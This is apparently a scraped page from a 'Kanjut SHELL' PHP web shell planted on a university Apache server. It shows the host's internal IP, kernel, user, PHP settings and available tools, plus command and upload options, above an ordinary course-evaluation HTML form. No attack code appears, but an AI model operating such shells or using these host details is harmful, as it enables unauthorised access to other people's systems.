Kanjut SHELL
Server IP : 172.16.15.8  /  Your IP : 3.15.214.185
Web Server : Apache
System : Linux zeus.vwu.edu 4.18.0-553.27.1.el8_10.x86_64 #1 SMP Wed Nov 6 14:29:02 UTC 2024 x86_64
User : apache ( 48)
PHP Version : 7.2.24
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON
Directory (0755) :  /home/brmorrison/public_html/

[  Home  ][  C0mmand  ][  Upload File  ]

Current File : /home/brmorrison/public_html/evaluationForm.html
<!-- evaluationForm.html -->

<CENTER>
    <h2>Form for Course Evaluation</h2>
    <hr>
    <Font color=blue size=4>
    <Form action="evaluationAction.php" method="post">
        Gender: <br>
        <input type="radio" name="gender" value="male"> Male <br>
        <input type="radio" name="gender" value="female"> Female <P>

        Student Status: <br>
        <input type="radio" name="status" value="freshman"> Freshman <br>
        <input type="radio" name="status" value="sophomore"> Sophomore <br>
        <input type="radio" name="status" value="junior"> Junior <br>
        <input type="radio" name="status" value="senior"> Senior <P>

        Course: <input type="text" size="20" name="course"> <P>

        How prepared did you feel after the lectures? <br>
        <input type="radio" name="preparation" value="0"> Poor <br>
        <input type="radio" name="preparation" value="1"> Average <br>
        <input type="radio" name="preparation" value="2"> Good <P>

        How would you rate the student participation in the course? <br>
        <input type="radio" name="participation" value="0"> Poor <br>
        <input type="radio" name="participation" value="1"> Average <br>
        <input type="radio" name="participation" value="2"> Good <P>
        
        How do you rate the course overall? <br>
        <input type="radio" name="overall" value="0"> Poor <br>
        <input type="radio" name="overall" value="1"> Average <br>
        <input type="radio" name="overall" value="2"> Good <P>

        <HR>
        <input type="submit" value="Submit">
        <input type="reset" value="Reset">
    </Form>
</CENTER>

<!-- add a link for going back to the course page -->
<HR>
<A HREF="index.html">Course Home</A>


Stv3n404 - 2023